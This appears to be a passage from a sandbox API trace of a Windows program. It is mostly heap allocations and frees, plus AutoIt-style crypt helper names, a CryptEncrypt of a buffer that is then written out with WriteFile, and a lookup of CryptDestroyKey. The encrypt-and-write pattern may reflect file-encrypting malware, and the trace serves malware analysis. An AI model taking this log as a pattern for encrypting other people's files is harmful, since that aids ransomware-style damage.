[0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0265.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0265.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0265.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0265.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0265.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0265.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0265.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0265.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0265.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0265.634] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0265.634] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.635] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x9adc) returned 0x2f3cbb8 [0265.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3cbb8 | out: hHeap=0x970000) returned 1 [0265.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0265.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0265.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0265.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.637] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0265.638] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0265.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0265.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0265.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0265.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0265.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0265.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0265.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0265.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51ca0 [0265.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51ca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0265.639] CryptEncrypt (in: hKey=0xa87090, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f330d0*, pdwDataLen=0x8cef60*=0x9adc, dwBufLen=0x9ae0 | out: pbData=0x2f330d0*, pdwDataLen=0x8cef60*=0x9ae0) returned 1 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0265.641] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551d8 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552c8 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0265.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0265.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552b8 [0265.642] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0265.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0265.644] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0265.645] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0265.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.645] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0265.645] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0265.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0265.646] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0265.646] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0265.646] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0265.646] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0265.646] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0265.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0265.647] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.647] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0265.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0265.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0265.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0265.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0265.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0265.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.652] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0265.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0265.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0265.654] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0x9ae0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0x9ae0, lpOverlapped=0x0) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0265.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0265.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0265.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0265.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0265.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0265.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0265.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51610 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517c0 [0265.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0265.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0265.658] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0265.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f38 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0265.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0265.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0265.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0265.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0265.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0265.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0265.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0265.659] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0265.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0265.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0265.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0265.660] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0265.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0265.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51b38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0265.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0265.661] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0265.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: 